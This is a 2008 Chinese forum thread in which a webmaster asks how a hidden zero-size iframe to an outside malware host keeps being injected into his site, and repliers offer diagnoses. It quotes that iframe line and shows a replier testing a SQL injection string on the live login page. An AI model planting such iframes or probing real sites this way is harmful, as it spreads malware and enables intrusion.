急救！被IFRAME挂马，查后门问题

newahd 2008-05-24 11:49:11

我的站最近三天两头就被挂IFRAME，代码是这个：

<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe>

现在已经检查修补了一翻有关上传的程序，也加入了防注入补丁。但还是被挂
我想，应该是网站上还留有原来的后门，但很奇怪的是，怎么找也找不到其它可疑的文件，把整站下载下来，用批量搜索工具查找代码也找不到，用杀毒软件扫也没有。他到底是怎么继续挂马的呢？

我不得不把站点地址贴出来，高手帮我看看我这个站到底还有没有漏洞：
http://www.st-print.com

...全文

151 15 打赏收藏转发到动态举报

写回复

用AI写文章

15 条回复

切换为时间正序

请发表友善的回复…

发表回复

zhen2046 2008-06-10

打赏
举报

我也中了，还是一直中下去，改了中，中了再改，。。。。。
现在我把网页都改为只读属性了，然后几不会再中了。
我也想知道，这个挂马是怎么搞进去的。应该是服务器的问题吧。

zhen2046 2008-06-10

打赏
举报

一把编程的菜刀 2008-05-26

打赏
举报

呵呵，改你网站文件，有很多方法的，不单只是从你本站下手！！如果是服务器被入侵的话，你是没办法的

icake 2008-05-26

打赏
举报

查下数据库,保不准也有这一句

newahd 2008-05-26

打赏
举报

顶一下！~~~~~~~~~~！

钛元素 2008-05-26

打赏
举报

你的网站是否有上传功能?查看此类型代码是否有问题

jhwcd 2008-05-26

打赏
举报

查一下程序代码，可能还有SQL 注入漏洞。
木马可能还在，仔细检查一编，把文件夹的权限不要设置太大，一般只给读的权限就行。

gbfxixi 2008-05-26

打赏
举报

程序有可能还存在小码。

ilovey4 2008-05-26

打赏
举报

弄不好服务器被拿了

一把编程的菜刀 2008-05-24

打赏
举报

这代码是你在原文件里实实在在有的，还是只是看网页里存在

wfwclyms 2008-05-24

打赏
举报

这个应该是服务器的漏洞,不是你网页文件上有漏洞

newahd 2008-05-24

打赏
举报

放谢各位，我意思是漏洞应该已经补好了，但就是说想把原来已经被放进去的后门找进来，不管小马大马。但奇怪的就是找不到

请问难道只注入而不需要有任何马文件在我网站上，也一样能修改的我程序吗？？

sonicryu 2008-05-24

打赏
举报

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式 'username='' or '1'='1''' 中。

/user/login.asp，行 7

你的网站用的是access 数据库而且返回明文很容易被暴库之类的。。。关闭提示吧。。。。

sonicryu 2008-05-24